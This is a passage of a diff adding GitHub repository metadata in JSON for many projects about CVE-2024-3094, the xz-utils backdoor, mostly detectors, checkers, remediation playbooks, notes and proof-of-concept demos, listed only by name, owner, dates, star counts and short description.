+ "description": null, + "fork": false, + "created_at": "2024-03-31T17:53:11Z", + "updated_at": "2024-03-31T17:53:11Z", + "pushed_at": "2024-03-31T17:56:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 780121031, + "name": "CVE-2024-3094", + "full_name": "Mustafa1986\/CVE-2024-3094", + "owner": { + "login": "Mustafa1986", + "id": 27927358, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27927358?v=4", + "html_url": "https:\/\/github.com\/Mustafa1986", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Mustafa1986\/CVE-2024-3094", + "description": null, + "fork": false, + "created_at": "2024-03-31T18:46:58Z", + "updated_at": "2024-04-01T05:49:11Z", + "pushed_at": "2024-04-01T05:49:08Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 780214985, + "name": "XZ-Utils_CVE-2024-3094", + "full_name": "MrBUGLF\/XZ-Utils_CVE-2024-3094", + "owner": { + "login": "MrBUGLF", + "id": 20143351, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20143351?v=4", + "html_url": "https:\/\/github.com\/MrBUGLF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MrBUGLF\/XZ-Utils_CVE-2024-3094", + "description": "XZ-Utils工具库恶意后门植入漏洞(CVE-2024-3094)", + "fork": false, + "created_at": "2024-04-01T01:56:08Z", + "updated_at": "2024-04-01T01:59:16Z", + "pushed_at": "2024-04-01T02:03:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 780222430, + "name": "cve-2024-3094-detect", + "full_name": "galacticquest\/cve-2024-3094-detect", + "owner": { + "login": "galacticquest", + "id": 162942423, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/162942423?v=4", + "html_url": "https:\/\/github.com\/galacticquest", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/galacticquest\/cve-2024-3094-detect", + "description": null, + "fork": false, + "created_at": "2024-04-01T02:25:33Z", + "updated_at": "2024-04-01T13:10:39Z", + "pushed_at": "2024-04-01T03:09:45Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 780339519, + "name": "CVE-2024-3094-info", + "full_name": "mightysai1997\/CVE-2024-3094-info", + "owner": { + "login": "mightysai1997", + "id": 110396758, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/110396758?v=4", + "html_url": "https:\/\/github.com\/mightysai1997", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mightysai1997\/CVE-2024-3094-info", + "description": null, + "fork": false, + "created_at": "2024-04-01T09:05:47Z", + "updated_at": "2024-04-01T09:06:03Z", + "pushed_at": "2024-04-01T09:05:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 780339753, + "name": "CVE-2024-3094", + "full_name": "mightysai1997\/CVE-2024-3094", + "owner": { + "login": "mightysai1997", + "id": 110396758, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/110396758?v=4", + "html_url": "https:\/\/github.com\/mightysai1997", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mightysai1997\/CVE-2024-3094", + "description": null, + "fork": false, + "created_at": "2024-04-01T09:06:25Z", + "updated_at": "2024-04-01T09:06:38Z", + "pushed_at": "2024-04-01T09:06:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 780341040, + "name": "xz-backdoor-vulnerability", + "full_name": "mesutgungor\/xz-backdoor-vulnerability", + "owner": { + "login": "mesutgungor", + "id": 4573148, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4573148?v=4", + "html_url": "https:\/\/github.com\/mesutgungor", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mesutgungor\/xz-backdoor-vulnerability", + "description": "CVE-2024-3094", + "fork": false, + "created_at": "2024-04-01T09:09:54Z", + "updated_at": "2024-04-01T09:18:11Z", + "pushed_at": "2024-04-01T09:18:08Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 780415912, + "name": "CVE-2024-3094", + "full_name": "reuteras\/CVE-2024-3094", + "owner": { + "login": "reuteras", + "id": 449846, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/449846?v=4", + "html_url": "https:\/\/github.com\/reuteras", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/reuteras\/CVE-2024-3094", + "description": "Obsidian notes about CVE-2024-3094", + "fork": false, + "created_at": "2024-04-01T12:41:00Z", + "updated_at": "2024-12-12T11:39:03Z", + "pushed_at": "2024-05-05T08:53:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 780459560, + "name": "xzbot", + "full_name": "amlweems\/xzbot", + "owner": { + "login": "amlweems", + "id": 117625, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/117625?v=4", + "html_url": "https:\/\/github.com\/amlweems", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/amlweems\/xzbot", + "description": "notes, honeypot, and exploit demo for the xz backdoor (CVE-2024-3094)", + "fork": false, + "created_at": "2024-04-01T14:28:09Z", + "updated_at": "2025-01-05T09:23:01Z", + "pushed_at": "2024-04-03T04:58:50Z", + "stargazers_count": 3503, + "watchers_count": 3503, + "has_discussions": false, + "forks_count": 240, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 240, + "watchers": 3503, + "score": 0, + "subscribers_count": 38 + }, + { + "id": 780480213, + "name": "CVE-2024-3094", + "full_name": "gustavorobertux\/CVE-2024-3094", + "owner": { + "login": "gustavorobertux", + "id": 38466612, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38466612?v=4", + "html_url": "https:\/\/github.com\/gustavorobertux", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gustavorobertux\/CVE-2024-3094", + "description": "Checker - CVE-2024-3094", + "fork": false, + "created_at": "2024-04-01T15:15:16Z", + "updated_at": "2024-04-03T18:37:25Z", + "pushed_at": "2024-04-02T10:39:09Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 780489939, + "name": "detectar_cve-2024-3094", + "full_name": "ackemed\/detectar_cve-2024-3094", + "owner": { + "login": "ackemed", + "id": 112708193, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/112708193?v=4", + "html_url": "https:\/\/github.com\/ackemed", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ackemed\/detectar_cve-2024-3094", + "description": null, + "fork": false, + "created_at": "2024-04-01T15:36:58Z", + "updated_at": "2024-04-01T23:04:50Z", + "pushed_at": "2024-04-01T23:04:46Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 780503272, + "name": "xz-cve-2024-3094", + "full_name": "0xlane\/xz-cve-2024-3094", + "owner": { + "login": "0xlane", + "id": 22788893, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22788893?v=4", + "html_url": "https:\/\/github.com\/0xlane", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xlane\/xz-cve-2024-3094", + "description": "XZ Backdoor Extract(Test on Ubuntu 23.10)", + "fork": false, + "created_at": "2024-04-01T16:08:50Z", + "updated_at": "2024-11-12T00:50:49Z", + "pushed_at": "2024-04-02T07:12:53Z", + "stargazers_count": 16, + "watchers_count": 16, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2024-3094", + "xz", + "xz-utils" + ], + "visibility": "public", + "forks": 5, + "watchers": 16, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 780517704, + "name": "CVE-2024-3094", + "full_name": "dah4k\/CVE-2024-3094", + "owner": { + "login": "dah4k", + "id": 84741290, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84741290?v=4", + "html_url": "https:\/\/github.com\/dah4k", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dah4k\/CVE-2024-3094", + "description": null, + "fork": false, + "created_at": "2024-04-01T16:42:47Z", + "updated_at": "2024-04-01T16:43:31Z", + "pushed_at": "2024-04-01T18:17:23Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 780691332, + "name": "revisaxzutils", + "full_name": "hackingetico21\/revisaxzutils", + "owner": { + "login": "hackingetico21", + "id": 86624859, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86624859?v=4", + "html_url": "https:\/\/github.com\/hackingetico21", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hackingetico21\/revisaxzutils", + "description": "Script en bash para revisar si tienes la vulnerabilidad CVE-2024-3094.", + "fork": false, + "created_at": "2024-04-02T01:22:04Z", + "updated_at": "2024-04-02T01:28:45Z", + "pushed_at": "2024-04-02T01:28:41Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 780700554, + "name": "CVE-2024-3094-XZ-Backdoor-Detector", + "full_name": "devjanger\/CVE-2024-3094-XZ-Backdoor-Detector", + "owner": { + "login": "devjanger", + "id": 55939719, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55939719?v=4", + "html_url": "https:\/\/github.com\/devjanger", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/devjanger\/CVE-2024-3094-XZ-Backdoor-Detector", + "description": "CVE-2024-3094 XZ Backdoor Detector", + "fork": false, + "created_at": "2024-04-02T01:56:29Z", + "updated_at": "2024-04-02T02:08:37Z", + "pushed_at": "2024-04-02T02:24:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 780728046, + "name": "CVE-2024-3094", + "full_name": "ScrimForever\/CVE-2024-3094", + "owner": { + "login": "ScrimForever", + "id": 5040124, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5040124?v=4", + "html_url": "https:\/\/github.com\/ScrimForever", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ScrimForever\/CVE-2024-3094", + "description": "Detectar CVE-2024-3094", + "fork": false, + "created_at": "2024-04-02T03:36:07Z", + "updated_at": "2024-04-02T20:58:00Z", + "pushed_at": "2024-04-02T03:38:30Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 780837798, + "name": "CVE-2024-3094", + "full_name": "pentestfunctions\/CVE-2024-3094", + "owner": { + "login": "pentestfunctions", + "id": 144001335, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/144001335?v=4", + "html_url": "https:\/\/github.com\/pentestfunctions", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pentestfunctions\/CVE-2024-3094", + "description": "CVE-2024-3094 - Checker (fix for arch etc)", + "fork": false, + "created_at": "2024-04-02T08:55:50Z", + "updated_at": "2024-08-12T00:12:41Z", + "pushed_at": "2024-04-02T09:11:43Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 781132313, + "name": "xzk8s", + "full_name": "r0binak\/xzk8s", + "owner": { + "login": "r0binak", + "id": 80983900, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80983900?v=4", + "html_url": "https:\/\/github.com\/r0binak", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/r0binak\/xzk8s", + "description": "Dockerfile and Kubernetes manifests for reproduce CVE-2024-3094", + "fork": false, + "created_at": "2024-04-02T20:07:14Z", + "updated_at": "2024-11-18T23:43:44Z", + "pushed_at": "2024-04-06T16:09:56Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-3094", + "exploit", + "k8s", + "xz-utils-backdoor" + ], + "visibility": "public", + "forks": 0, + "watchers": 10, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 781135899, + "name": "xz-backdoor-links", + "full_name": "przemoc\/xz-backdoor-links", + "owner": { + "login": "przemoc", + "id": 142372, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/142372?v=4", + "html_url": "https:\/\/github.com\/przemoc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/przemoc\/xz-backdoor-links", + "description": "apocalypxze: xz backdoor (2024) AKA CVE-2024-3094 related links", + "fork": false, + "created_at": "2024-04-02T20:17:07Z", + "updated_at": "2024-09-10T14:25:55Z", + "pushed_at": "2024-04-20T14:28:16Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "apocalypxze", + "cve-2024-3094", + "xz-utils-backdoor" + ], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 781344373, + "name": "CVE-2024-3094-fix-exploits", + "full_name": "Security-Phoenix-demo\/CVE-2024-3094-fix-exploits", + "owner": { + "login": "Security-Phoenix-demo", + "id": 79762943, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79762943?v=4", + "html_url": "https:\/\/github.com\/Security-Phoenix-demo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Security-Phoenix-demo\/CVE-2024-3094-fix-exploits", + "description": "Collection of Detection, Fix, and exploit for CVE-2024-3094 ", + "fork": false, + "created_at": "2024-04-03T07:51:49Z", + "updated_at": "2024-04-26T01:31:19Z", + "pushed_at": "2024-04-03T07:57:30Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 781419608, + "name": "CVE-2024-3094-backdoor-env-container", + "full_name": "MagpieRYL\/CVE-2024-3094-backdoor-env-container", + "owner": { + "login": "MagpieRYL", + "id": 33757317, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33757317?v=4", + "html_url": "https:\/\/github.com\/MagpieRYL", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MagpieRYL\/CVE-2024-3094-backdoor-env-container", + "description": "This is a container environment running CVE-2024-3094 sshd backdoor instance, working with https:\/\/github.com\/amlweems\/xzbot project. IT IS NOT Docker, just implemented by chroot.", + "fork": false, + "created_at": "2024-04-03T10:50:47Z", + "updated_at": "2024-11-06T15:35:00Z", + "pushed_at": "2024-04-03T13:05:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 781477807, + "name": "xz-backdoor-CVE-2024-3094-Check", + "full_name": "Bella-Bc\/xz-backdoor-CVE-2024-3094-Check", + "owner": { + "login": "Bella-Bc", + "id": 10534659, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10534659?v=4", + "html_url": "https:\/\/github.com\/Bella-Bc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Bella-Bc\/xz-backdoor-CVE-2024-3094-Check", + "description": "Verify if your installed version of xz-utils is vulnerable to CVE-2024-3094 backdoor", + "fork": false, + "created_at": "2024-04-03T13:09:32Z", + "updated_at": "2024-04-16T17:57:55Z", + "pushed_at": "2024-04-03T14:02:00Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 781642777, + "name": "CVE-2024-3094-Checker", + "full_name": "TheTorjanCaptain\/CVE-2024-3094-Checker", + "owner": { + "login": "TheTorjanCaptain", + "id": 109307319, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/109307319?v=4", + "html_url": "https:\/\/github.com\/TheTorjanCaptain", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TheTorjanCaptain\/CVE-2024-3094-Checker", + "description": "The repository consists of a checker file that confirms if your xz version and xz-utils package is vulnerable to CVE-2024-3094.", + "fork": false, + "created_at": "2024-04-03T19:10:43Z", + "updated_at": "2024-04-03T19:12:47Z", + "pushed_at": "2024-04-03T19:36:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 781709179, + "name": "CVE-2024-3094-Checker", + "full_name": "iheb2b\/CVE-2024-3094-Checker", + "owner": { + "login": "iheb2b", + "id": 61081690, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61081690?v=4", + "html_url": "https:\/\/github.com\/iheb2b", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/iheb2b\/CVE-2024-3094-Checker", + "description": "The CVE-2024-3094 Checker is a Bash tool for identifying if Linux systems are at risk from the CVE-2024-3094 flaw in XZ\/LZMA utilities. It checks XZ versions, SSHD's LZMA linkage, and scans for specific byte patterns, delivering results in a concise table format. ", + "fork": false, + "created_at": "2024-04-03T22:19:50Z", + "updated_at": "2024-04-03T22:20:53Z", + "pushed_at": "2024-04-06T22:15:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 781846725, + "name": "cve-2024-3094", + "full_name": "felipecosta09\/cve-2024-3094", + "owner": { + "login": "felipecosta09", + "id": 33869171, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33869171?v=4", + "html_url": "https:\/\/github.com\/felipecosta09", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/felipecosta09\/cve-2024-3094", + "description": "A tutorial on how to detect the CVE 2024-3094", + "fork": false, + "created_at": "2024-04-04T06:40:56Z", + "updated_at": "2024-04-05T10:39:12Z", + "pushed_at": "2024-04-05T10:50:45Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "containers", + "containersecurity", + "cve20243094", + "trendmicro", + "visionone", + "vulnerability" + ], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 781963666, + "name": "liblzma-scan", + "full_name": "weltregie\/liblzma-scan", + "owner": { + "login": "weltregie", + "id": 1319341, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1319341?v=4", + "html_url": "https:\/\/github.com\/weltregie", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/weltregie\/liblzma-scan", + "description": "Scans liblzma from xu-utils for backdoor (CVE-2024-3094)", + "fork": false, + "created_at": "2024-04-04T11:29:41Z", + "updated_at": "2024-04-04T11:31:33Z", + "pushed_at": "2024-04-04T11:36:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 782016563, + "name": "ansible-CVE-2024-3094", + "full_name": "crfearnworks\/ansible-CVE-2024-3094", + "owner": { + "login": "crfearnworks", + "id": 128843549, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/128843549?v=4", + "html_url": "https:\/\/github.com\/crfearnworks", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/crfearnworks\/ansible-CVE-2024-3094", + "description": "Ansible playbooks designed to check and remediate CVE-2024-3094 (XZ Backdoor)", + "fork": false, + "created_at": "2024-04-04T13:31:20Z", + "updated_at": "2024-04-05T21:44:53Z", + "pushed_at": "2024-04-04T18:46:34Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 782054881, + "name": "ansible-playbook-cve-2024-3094", + "full_name": "robertdebock\/ansible-playbook-cve-2024-3094", + "owner": { + "login": "robertdebock", + "id": 3830775, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3830775?v=4", + "html_url": "https:\/\/github.com\/robertdebock", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/robertdebock\/ansible-playbook-cve-2024-3094", + "description": "A small repo with a single playbook.", + "fork": false, + "created_at": "2024-04-04T14:52:09Z", + "updated_at": "2024-04-16T16:04:25Z", + "pushed_at": "2024-04-05T11:12:47Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 782282800, + "name": "ludus_xz_backdoor", + "full_name": "badsectorlabs\/ludus_xz_backdoor", + "owner": { + "login": "badsectorlabs", + "id": 43366550, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43366550?v=4", + "html_url": "https:\/\/github.com\/badsectorlabs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/badsectorlabs\/ludus_xz_backdoor", + "description": "An Ansible Role that installs the xz backdoor (CVE-2024-3094) on a Debian host and optionally installs the xzbot tool.", + "fork": false, + "created_at": "2024-04-05T01:44:26Z", + "updated_at": "2024-06-11T20:12:04Z", + "pushed_at": "2024-04-05T02:36:41Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 782827523, + "name": "xz-backdoor-scan", + "full_name": "Juul\/xz-backdoor-scan", + "owner": { + "login": "Juul", + "id": 122752, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/122752?v=4", + "html_url": "https:\/\/github.com\/Juul", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Juul\/xz-backdoor-scan", + "description": "Scan for files containing the signature from the `xz` backdoor (CVE-2024-3094)", + "fork": false, + "created_at": "2024-04-06T06:29:43Z", + "updated_at": "2024-04-06T06:30:17Z", + "pushed_at": "2024-04-07T05:37:08Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 786174088, + "name": "Detectar-Backdoor-en-liblzma-de-XZ-utils-CVE-2024-3094-", + "full_name": "fevar54\/Detectar-Backdoor-en-liblzma-de-XZ-utils-CVE-2024-3094-", + "owner": { + "login": "fevar54", + "id": 80516843, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80516843?v=4", + "html_url": "https:\/\/github.com\/fevar54", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fevar54\/Detectar-Backdoor-en-liblzma-de-XZ-utils-CVE-2024-3094-", + "description": "La siguiente regla YARA ayuda a detectar la presencia del backdoor en la librería liblzma comprometida en sistemas que utilizan las versiones 5.6.0 y 5.6.1 de la herramienta de compresión XZ.", + "fork": false, + "created_at": "2024-04-13T16:37:32Z", + "updated_at": "2024-04-13T16:37:32Z", + "pushed_at": "2024-04-13T16:46:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 788459467, + "name": "xzwhy", + "full_name": "neuralinhibitor\/xzwhy", + "owner": { + "login": "neuralinhibitor", + "id": 1449788, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1449788?v=4", + "html_url": "https:\/\/github.com\/neuralinhibitor", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/neuralinhibitor\/xzwhy", + "description": "XZ Utils CVE-2024-3094 POC for Kubernetes", + "fork": false, + "created_at": "2024-04-18T13:08:05Z", + "updated_at": "2024-08-31T10:42:48Z", + "pushed_at": "2024-04-18T15:09:42Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 804438695, + "name": "Sicurezza-Informatica-Presentazione", + "full_name": "AndreaCicca\/Sicurezza-Informatica-Presentazione", + "owner": { + "login": "AndreaCicca", + "id": 58073848, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58073848?v=4", + "html_url": "https:\/\/github.com\/AndreaCicca", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AndreaCicca\/Sicurezza-Informatica-Presentazione", + "description": "Presentazione per il corsi di sicurezza Informatica sulla vulnerabilità CVE-2024-3094", + "fork": false, + "created_at": "2024-05-22T15:33:01Z", + "updated_at": "2024-09-01T22:08:40Z", + "pushed_at": "2024-06-07T07:26:21Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 813672523, + "name": "CVE-2024-3094", + "full_name": "shefirot\/CVE-2024-3094", + "owner": { + "login": "shefirot", + "id": 24395852, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24395852?v=4", + "html_url": "https:\/\/github.com\/shefirot", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shefirot\/CVE-2024-3094", + "description": "Basic POC to test CVE-2024-3094 vulnerability inside K8s cluster", + "fork": false, + "created_at": "2024-06-11T14:19:17Z", + "updated_at": "2024-06-11T14:21:23Z", + "pushed_at": "2024-06-11T14:21:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 824564785, + "name": "CVE-2024-3094", + "full_name": 